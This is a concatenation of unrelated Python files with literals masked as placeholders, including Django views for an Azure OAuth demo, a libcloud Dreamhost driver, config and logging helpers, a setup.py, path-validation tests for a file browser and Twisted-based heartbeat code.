<s> from xml . dom . minidom import parseString <EOL> from django . shortcuts import render , redirect <EOL> import requests <EOL> from requests_oauthlib import OAuth2Session <EOL> from django . conf import settings <EOL> import logging <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> def getText ( nodelist ) : <EOL> rc = [ ] <EOL> for node in nodelist : <EOL> if node . nodeType == node . TEXT_NODE : <EOL> rc . append ( node . data ) <EOL> return '<STR_LIT>' . join ( rc ) <EOL> def index ( request ) : <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> return render ( request , '<STR_LIT>' , context ) <EOL> def step1 ( request ) : <EOL> constants = settings . CONSTANTS <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> STEP_1_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> AUTHORIZATION_BASE_URL = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_1_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> authorization_url , state = azure_session . authorization_url ( AUTHORIZATION_BASE_URL % '<STR_LIT>' ) <EOL> resp = requests . get ( authorization_url ) <EOL> return redirect ( resp . url ) <EOL> def step2 ( request ) : <EOL> constants = settings . CONSTANTS <EOL> STEP_2_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_3_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> BASE_TOKEN_URL = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> CLIENT_KEY = constants [ '<STR_LIT>' ] <EOL> RESOURCE_URI = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> if request . method == '<STR_LIT:GET>' : <EOL> aad_code = request . GET . get ( '<STR_LIT:code>' , '<STR_LIT>' ) <EOL> request . session [ '<STR_LIT>' ] = aad_code <EOL> context [ '<STR_LIT>' ] = aad_code <EOL> return render ( request , STEP_2_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> aad_code = request . session [ '<STR_LIT>' ] <EOL> token_dict = azure_session . fetch_token ( BASE_TOKEN_URL % '<STR_LIT>' , code = aad_code , client_secret = CLIENT_KEY , resource = RESOURCE_URI ) <EOL> request . session [ '<STR_LIT>' ] = token_dict <EOL> context [ '<STR_LIT>' ] = token_dict <EOL> return render ( request , STEP_3_TEMPLATE_NAME , context ) <EOL> def step3 ( request ) : <EOL> constants = settings . CONSTANTS <EOL> STEP_3_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_4_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> GET_SUBSCRIPTIONS_URL = constants [ '<STR_LIT>' ] <EOL> MS_API_VERSION_HEADER = constants [ '<STR_LIT>' ] <EOL> MS_API_VERSION_HEADER_VALUE = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_3_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> token = request . session [ '<STR_LIT>' ] <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI , token = token ) <EOL> resp = azure_session . get ( GET_SUBSCRIPTIONS_URL , headers = { MS_API_VERSION_HEADER : MS_API_VERSION_HEADER_VALUE } ) <EOL> dom = parseString ( resp . content ) <EOL> subscriptions = dom . getElementsByTagName ( "<STR_LIT>" ) <EOL> output = [ ] <EOL> tenantText = '<STR_LIT>' <EOL> for subscription in subscriptions : <EOL> name = subscription . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> nameText = getText ( name . childNodes ) <EOL> output . append ( nameText ) <EOL> tenantid = subscription . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> tenantText = getText ( tenantid . childNodes ) <EOL> output . append ( tenantText ) <EOL> context [ '<STR_LIT>' ] = output <EOL> request . session [ '<STR_LIT>' ] = tenantText <EOL> return render ( request , STEP_4_TEMPLATE_NAME , context ) <EOL> def step4 ( request ) : <EOL> constants = settings . CONSTANTS <EOL> STEP_4_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_5_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> BASE_TOKEN_URL = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> CLIENT_KEY = constants [ '<STR_LIT>' ] <EOL> RESOURCE_URI = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_4_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> tenantid = request . session [ '<STR_LIT>' ] <EOL> aad_code = request . session [ '<STR_LIT>' ] <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> token_dict = azure_session . fetch_token ( BASE_TOKEN_URL % tenantid , code = aad_code , client_secret = CLIENT_KEY , resource = RESOURCE_URI ) <EOL> context [ '<STR_LIT>' ] = token_dict <EOL> return render ( request , STEP_5_TEMPLATE_NAME , context ) <EOL> def step1_live ( request ) : <EOL> constants = settings . CONSTANTS <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> STEP_1_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> AUTHORIZATION_BASE_URL = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_1_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> tenant_name = request . POST [ '<STR_LIT>' ] <EOL> logging . info ( '<STR_LIT>' + tenant_name ) <EOL> resource_name = tenant_name + '<STR_LIT>' <EOL> request . session [ '<STR_LIT>' ] = resource_name <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> authorization_url , state = azure_session . authorization_url ( AUTHORIZATION_BASE_URL % resource_name ) <EOL> resp = requests . get ( authorization_url ) <EOL> return redirect ( resp . url ) <EOL> def step2_live ( request ) : <EOL> constants = settings . CONSTANTS <EOL> STEP_2_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_3_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> BASE_TOKEN_URL = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> CLIENT_KEY = constants [ '<STR_LIT>' ] <EOL> RESOURCE_URI = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> if request . method == '<STR_LIT:GET>' : <EOL> aad_code = request . GET . get ( '<STR_LIT:code>' , '<STR_LIT>' ) <EOL> request . session [ '<STR_LIT>' ] = aad_code <EOL> context [ '<STR_LIT>' ] = aad_code <EOL> return render ( request , STEP_2_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> aad_code = request . session [ '<STR_LIT>' ] <EOL> resource_name = request . session [ '<STR_LIT>' ] <EOL> token_dict = azure_session . fetch_token ( BASE_TOKEN_URL % resource_name , code = aad_code , client_secret = CLIENT_KEY , resource = RESOURCE_URI ) <EOL> request . session [ '<STR_LIT>' ] = token_dict <EOL> context [ '<STR_LIT>' ] = token_dict <EOL> return render ( request , STEP_3_TEMPLATE_NAME , context ) <EOL> def step3_live ( request ) : <EOL> constants = settings . CONSTANTS <EOL> STEP_3_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_4_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> GET_SUBSCRIPTIONS_URL = constants [ '<STR_LIT>' ] <EOL> MS_API_VERSION_HEADER = constants [ '<STR_LIT>' ] <EOL> MS_API_VERSION_HEADER_VALUE = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_3_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> token = request . session [ '<STR_LIT>' ] <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI , token = token ) <EOL> resp = azure_session . get ( GET_SUBSCRIPTIONS_URL , headers = { MS_API_VERSION_HEADER : MS_API_VERSION_HEADER_VALUE } ) <EOL> dom = parseString ( resp . content ) <EOL> subscriptions = dom . getElementsByTagName ( "<STR_LIT>" ) <EOL> output = [ ] <EOL> tenantText = '<STR_LIT>' <EOL> for subscription in subscriptions : <EOL> name = subscription . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> nameText = getText ( name . childNodes ) <EOL> output . append ( nameText ) <EOL> tenantid = subscription . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> tenantText = getText ( tenantid . childNodes ) <EOL> output . append ( tenantText ) <EOL> context [ '<STR_LIT>' ] = output <EOL> request . session [ '<STR_LIT>' ] = tenantText <EOL> return render ( request , STEP_4_TEMPLATE_NAME , context ) <EOL> def step4_live ( request ) : <EOL> constants = settings . CONSTANTS <EOL> STEP_4_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> STEP_5_TEMPLATE_NAME = constants [ '<STR_LIT>' ] <EOL> REDIRECT_URI = constants [ '<STR_LIT>' ] <EOL> BASE_TOKEN_URL = constants [ '<STR_LIT>' ] <EOL> CLIENT_ID = constants [ '<STR_LIT>' ] <EOL> CLIENT_KEY = constants [ '<STR_LIT>' ] <EOL> RESOURCE_URI = constants [ '<STR_LIT>' ] <EOL> context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render ( request , STEP_4_TEMPLATE_NAME , context ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> tenantid = request . session [ '<STR_LIT>' ] <EOL> aad_code = request . session [ '<STR_LIT>' ] <EOL> azure_session = OAuth2Session ( CLIENT_ID , redirect_uri = REDIRECT_URI ) <EOL> token_dict = azure_session . fetch_token ( BASE_TOKEN_URL % tenantid , code = aad_code , client_secret = CLIENT_KEY , resource = RESOURCE_URI ) <EOL> context [ '<STR_LIT>' ] = token_dict <EOL> return render ( request , STEP_5_TEMPLATE_NAME , context ) </s>
<s> from redis_cache . backends . single import RedisCache <EOL> from redis_cache . backends . multiple import ShardedRedisCache <EOL> from redis_cache . backends . dummy import RedisDummyCache </s>
<s> """<STR_LIT>""" <EOL> from libcloud . base import ConnectionKey , Response , NodeDriver , Node <EOL> from libcloud . base import NodeSize , NodeImage <EOL> from libcloud . types import Provider , NodeState , InvalidCredsException <EOL> try : <EOL> import json <EOL> except : <EOL> import simplejson as json <EOL> """<STR_LIT>""" <EOL> DH_PS_SIZES = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:15> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT:default>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1000> , <EOL> '<STR_LIT>' : <NUM_LIT:50> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> } <EOL> class DreamhostAPIException ( Exception ) : <EOL> def __str__ ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . args [ <NUM_LIT:0> ] ) <EOL> class DreamhostResponse ( Response ) : <EOL> """<STR_LIT>""" <EOL> def parse_body ( self ) : <EOL> resp = json . loads ( self . body ) <EOL> if resp [ '<STR_LIT:result>' ] != '<STR_LIT:success>' : <EOL> raise Exception ( self . _api_parse_error ( resp ) ) <EOL> return resp [ '<STR_LIT:data>' ] <EOL> def parse_error ( self ) : <EOL> raise Exception <EOL> def _api_parse_error ( self , response ) : <EOL> if '<STR_LIT:data>' in response : <EOL> if response [ '<STR_LIT:data>' ] == '<STR_LIT>' : <EOL> raise InvalidCredsException ( "<STR_LIT>" ) <EOL> else : <EOL> raise DreamhostAPIException ( response [ '<STR_LIT:data>' ] ) <EOL> else : <EOL> raise DreamhostAPIException ( "<STR_LIT>" % ( self . body ) ) <EOL> class DreamhostConnection ( ConnectionKey ) : <EOL> """<STR_LIT>""" <EOL> host = '<STR_LIT>' <EOL> responseCls = DreamhostResponse <EOL> format = '<STR_LIT>' <EOL> def add_default_params ( self , params ) : <EOL> """<STR_LIT>""" <EOL> params [ '<STR_LIT:key>' ] = self . key <EOL> params [ '<STR_LIT>' ] = self . format <EOL> return params <EOL> class DreamhostNodeDriver ( NodeDriver ) : <EOL> """<STR_LIT>""" <EOL> type = Provider . DREAMHOST <EOL> name = "<STR_LIT>" <EOL> connectionCls = DreamhostConnection <EOL> _sizes = DH_PS_SIZES <EOL> def create_node ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> size = kwargs [ '<STR_LIT:size>' ] . ram <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT:type>' : kwargs [ '<STR_LIT:image>' ] . name , <EOL> '<STR_LIT:size>' : size <EOL> } <EOL> data = self . connection . request ( '<STR_LIT:/>' , params ) . object <EOL> return Node ( <EOL> id = data [ '<STR_LIT>' ] , <EOL> name = data [ '<STR_LIT>' ] , <EOL> state = NodeState . PENDING , <EOL> public_ip = [ ] , <EOL> private_ip = [ ] , <EOL> driver = self . connection . driver , <EOL> extra = { <EOL> '<STR_LIT:type>' : kwargs [ '<STR_LIT:image>' ] . name <EOL> } <EOL> ) <EOL> def destroy_node ( self , node ) : <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : node . id <EOL> } <EOL> try : <EOL> return self . connection . request ( '<STR_LIT:/>' , params ) . success ( ) <EOL> except DreamhostAPIException : <EOL> return False <EOL> def reboot_node ( self , node ) : <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : node . id <EOL> } <EOL> try : <EOL> return self . connection . request ( '<STR_LIT:/>' , params ) . success ( ) <EOL> except DreamhostAPIException : <EOL> return False <EOL> def list_nodes ( self , ** kwargs ) : <EOL> data = self . connection . request ( '<STR_LIT:/>' , { '<STR_LIT>' : '<STR_LIT>' } ) . object <EOL> return [ self . _to_node ( n ) for n in data ] <EOL> def list_images ( self , ** kwargs ) : <EOL> data = self . connection . request ( '<STR_LIT:/>' , { '<STR_LIT>' : '<STR_LIT>' } ) . object <EOL> images = [ ] <EOL> for img in data : <EOL> images . append ( NodeImage ( <EOL> id = img [ '<STR_LIT:image>' ] , <EOL> name = img [ '<STR_LIT:image>' ] , <EOL> driver = self . connection . driver <EOL> ) ) <EOL> return images <EOL> def list_sizes ( self , ** kwargs ) : <EOL> return [ NodeSize ( driver = self . connection . driver , ** i ) <EOL> for i in self . _sizes . values ( ) ] <EOL> def list_locations ( self , ** kwargs ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def _resize_node ( self , node , size ) : <EOL> if ( size < <NUM_LIT> or size > <NUM_LIT> ) : <EOL> return False <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : node . id , <EOL> '<STR_LIT:size>' : size <EOL> } <EOL> try : <EOL> return self . connection . request ( '<STR_LIT:/>' , params ) . success ( ) <EOL> except DreamhostAPIException : <EOL> return False <EOL> def _to_node ( self , data ) : <EOL> """<STR_LIT>""" <EOL> return Node ( <EOL> id = data [ '<STR_LIT>' ] , <EOL> name = data [ '<STR_LIT>' ] , <EOL> state = NodeState . UNKNOWN , <EOL> public_ip = [ data [ '<STR_LIT>' ] ] , <EOL> private_ip = [ ] , <EOL> driver = self . connection . driver , <EOL> extra = { <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT:type>' : data [ '<STR_LIT:type>' ] <EOL> } <EOL> ) </s>
<s> from __future__ import print_function <EOL> import logging , sys , types , os . path , re <EOL> from ConfigParser import RawConfigParser , NoOptionError <EOL> log = logging . getLogger ( '<STR_LIT>' . format ( __name__ ) ) <EOL> log . addHandler ( logging . NullHandler ( ) ) <EOL> class ConfigError ( Exception ) : <EOL> def __init__ ( self , msg ) : <EOL> Exception . __init__ ( self , msg ) <EOL> class Config : <EOL> def __init__ ( self , path , section = "<STR_LIT>" ) : <EOL> self . path = path <EOL> self . section = section <EOL> if not os . path . isfile ( path ) : <EOL> raise IOError ( "<STR_LIT>" . format ( path ) ) <EOL> self . parser = RawConfigParser ( allow_no_value = True ) <EOL> self . parser . read ( self . path ) <EOL> def _get ( self , opt ) : <EOL> """<STR_LIT>""" <EOL> return self . parser . get ( self . section , opt ) <EOL> def _getflag ( self , opt , log_msg = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . _get ( opt ) is None <EOL> except NoOptionError : <EOL> if log_msg : <EOL> log . info ( log_msg ) <EOL> return False <EOL> def _getfile ( self , opt ) : <EOL> filename = self . _get ( opt ) <EOL> if filename and os . path . isfile ( filename ) : <EOL> return filename <EOL> else : <EOL> raise self . config_error ( "<STR_LIT>" . format ( opt , filename ) ) <EOL> def config_error ( self , msg ) : <EOL> return ConfigError ( '<STR_LIT>' . format ( self . path , msg ) ) <EOL> def set_logging ( log , loglevelnum , logfile , verbose_console = False ) : <EOL> """<STR_LIT>""" <EOL> if not loglevelnum in [ logging . NOTSET , logging . DEBUG , logging . INFO , logging . WARNING , logging . ERROR , logging . CRITICAL ] : <EOL> log . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> log . setLevel ( logging . DEBUG ) <EOL> fh = logging . FileHandler ( logfile ) <EOL> fh . setLevel ( loglevelnum ) <EOL> fh . setFormatter ( logging . Formatter ( '<STR_LIT>' ) ) <EOL> log . addHandler ( fh ) <EOL> ch = logging . StreamHandler ( ) <EOL> if verbose_console : <EOL> ch . setLevel ( logging . DEBUG ) <EOL> else : <EOL> ch . setLevel ( logging . ERROR ) <EOL> ch . setFormatter ( logging . Formatter ( '<STR_LIT>' ) ) <EOL> log . addHandler ( ch ) <EOL> logging . getLogger ( '<STR_LIT>' ) . addHandler ( fh ) <EOL> except IOError , e : <EOL> msg = str ( e ) <EOL> if e . errno == <NUM_LIT> : <EOL> msg += '<STR_LIT>' <EOL> raise ConfigError ( msg ) </s>
<s> from __future__ import print_function <EOL> from nba_py import player <EOL> ap = player . PlayerList ( ) <EOL> print ( ap . info ( ) ) <EOL> pc = player . PlayerSummary ( '<STR_LIT>' ) <EOL> print ( pc . headline_stats ( ) ) <EOL> p_cstats = player . PlayerCareer ( '<STR_LIT>' ) <EOL> print ( p_cstats . regular_season_career_totals ( ) ) </s>
<s> import os <EOL> import sys <EOL> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> from version import VERSION <EOL> long_description = '''<STR_LIT>''' <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> extras_require = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = VERSION , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> test_suite = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> license = '<STR_LIT>' , <EOL> install_requires = install_requires , <EOL> extras_require = extras_require , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> ) </s>
<s> import shutil <EOL> from filebrowser . decorators import get_path , get_file <EOL> from filebrowser . sites import site <EOL> from tests import FilebrowserTestCase as TestCase <EOL> class GetPathTests ( TestCase ) : <EOL> def test_empty ( self ) : <EOL> self . assertEqual ( get_path ( '<STR_LIT>' , site ) , '<STR_LIT>' ) <EOL> def test_starts_with_period ( self ) : <EOL> self . assertIsNone ( get_path ( '<STR_LIT:..>' , site ) ) <EOL> self . assertIsNone ( get_path ( '<STR_LIT>' , site ) ) <EOL> def test_is_absolute ( self ) : <EOL> self . assertIsNone ( get_path ( '<STR_LIT>' , site ) ) <EOL> self . assertIsNone ( get_path ( '<STR_LIT>' , site ) ) <EOL> def test_does_not_exist ( self ) : <EOL> self . assertIsNone ( get_path ( '<STR_LIT>' , site ) ) <EOL> def test_valid ( self ) : <EOL> self . assertTrue ( get_path ( '<STR_LIT>' , site ) ) <EOL> class GetFileTests ( TestCase ) : <EOL> def test_empty ( self ) : <EOL> self . assertEqual ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) , '<STR_LIT>' ) <EOL> def test_starts_with_period ( self ) : <EOL> self . assertIsNone ( get_file ( '<STR_LIT:.>' , '<STR_LIT>' , site ) ) <EOL> def test_filename_starts_with_period ( self ) : <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> def test_is_absolute ( self ) : <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT:password>' , site ) ) <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> def test_filename_is_absolute ( self ) : <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> def test_does_not_exist ( self ) : <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> def test_valid_folder ( self ) : <EOL> self . assertTrue ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> def test_valid_file ( self ) : <EOL> self . assertIsNone ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) <EOL> shutil . copy ( self . STATIC_IMG_PATH , self . SUBFOLDER_PATH ) <EOL> self . assertTrue ( get_file ( '<STR_LIT>' , '<STR_LIT>' , site ) ) </s>
<s> from zope . interface import implements <EOL> from nodeset . core import interfaces <EOL> class NodeMonitor : <EOL> implements ( interfaces . heartbeat . INodeMonitor ) <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , node ) : <EOL> self . node = node <EOL> self . __ok = [ ] <EOL> self . __fails = [ ] <EOL> def heartbeat ( self ) : <EOL> d = self . node . callRemote ( '<STR_LIT>' ) <EOL> for callable , args , kwargs in self . __ok : <EOL> d . addCallback ( callable , * args , ** kwargs ) <EOL> for callable , args , kwargs in self . __fails : <EOL> d . addErrback ( callable , * args , ** kwargs ) <EOL> def onOk ( self , callable , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . __ok . append ( ( callable , args , kwargs ) ) <EOL> return self <EOL> def onFail ( self , callable , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . __fails . append ( ( callable , args , kwargs ) ) <EOL> return self <EOL> class NodeHeartBeat : <EOL> implements ( interfaces . heartbeat . INodeHeartBeat ) <EOL> def __init__ ( self , dispatcher ) : <EOL> self . monitors = set ( ) <EOL> self . dispatcher = dispatcher <EOL> self . delayed = None <EOL> def cancel ( self ) : <EOL> if self . delayed and self . delayed . active ( ) : <EOL> self . delayed . cancel ( ) <EOL> def _lookup ( self , node ) : <EOL> """<STR_LIT>""" <EOL> for m in self . monitors : <EOL> if m . node == node : <EOL> return m <EOL> raise KeyError ( "<STR_LIT>" % node ) <EOL> def has ( self , node ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> m = self . _lookup ( node ) <EOL> return True <EOL> except KeyError , e : <EOL> return False <EOL> def add ( self , node ) : <EOL> """<STR_LIT>""" <EOL> monitor = node . monitor or NodeMonitor ( node ) <EOL> self . monitors . add ( monitor ) <EOL> return monitor <EOL> def remove ( self , node ) : <EOL> """<STR_LIT>""" <EOL> monitor = node . monitor or self . _lookup ( node ) <EOL> self . monitors . remove ( monitor ) <EOL> return monitor <EOL> def schedule ( self , delay = <NUM_LIT:5> ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> self . delayed = reactor . callLater ( delay , self . _do_heartbeat ) <EOL> def _do_heartbeat ( self ) : <EOL> """<STR_LIT>""" <EOL> monitors = self . monitors . copy ( ) <EOL> for m in monitors : <EOL> m . heartbeat ( ) <EOL> del monitors <EOL> self . schedule ( ) </s>
<s> from twisted . trial import unittest <EOL> from twisted . internet import defer <EOL> from nodeset . core import config <EOL> from nodeset . common . twistedapi import NodeSetAppOptions <EOL> class ConfigurationTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> cfg = NodeSetAppOptions ( ) <EOL> cfg . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . config = config . Configurator ( ) <EOL> self . config . _config = cfg <EOL> def testListenParam ( self ) : <EOL> self . assertTrue ( self . config [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> def testDispatcherParam ( self ) : <EOL> self . assertTrue ( self . config [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> def testAnotherInstance ( self ) : <EOL> c = config . Configurator ( ) <EOL> self . assertTrue ( c [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> def testUpdate ( self ) : <EOL> self . config [ '<STR_LIT>' ] = '<STR_LIT:value>' <EOL> self . assertTrue ( self . config [ '<STR_LIT>' ] == '<STR_LIT:value>' ) <EOL> def testAnotherRoutine ( self ) : <EOL> def anotherRoutine ( d ) : <EOL> c = config . Configurator ( ) <EOL> self . assertTrue ( c [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> self . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> d = defer . Deferred ( ) <EOL> d . addCallback ( anotherRoutine ) <EOL> d . callback ( None ) <EOL> def testPassingAsArgument ( self ) : <EOL> def routine ( conf ) : <EOL> c = config . Configurator ( ) <EOL> self . assertTrue ( c == conf ) <EOL> d = defer . Deferred ( ) <EOL> d . addCallback ( routine ) <EOL> d . callback ( config . Configurator ( ) ) <EOL> def tearDown ( self ) : <EOL> del self . config </s>
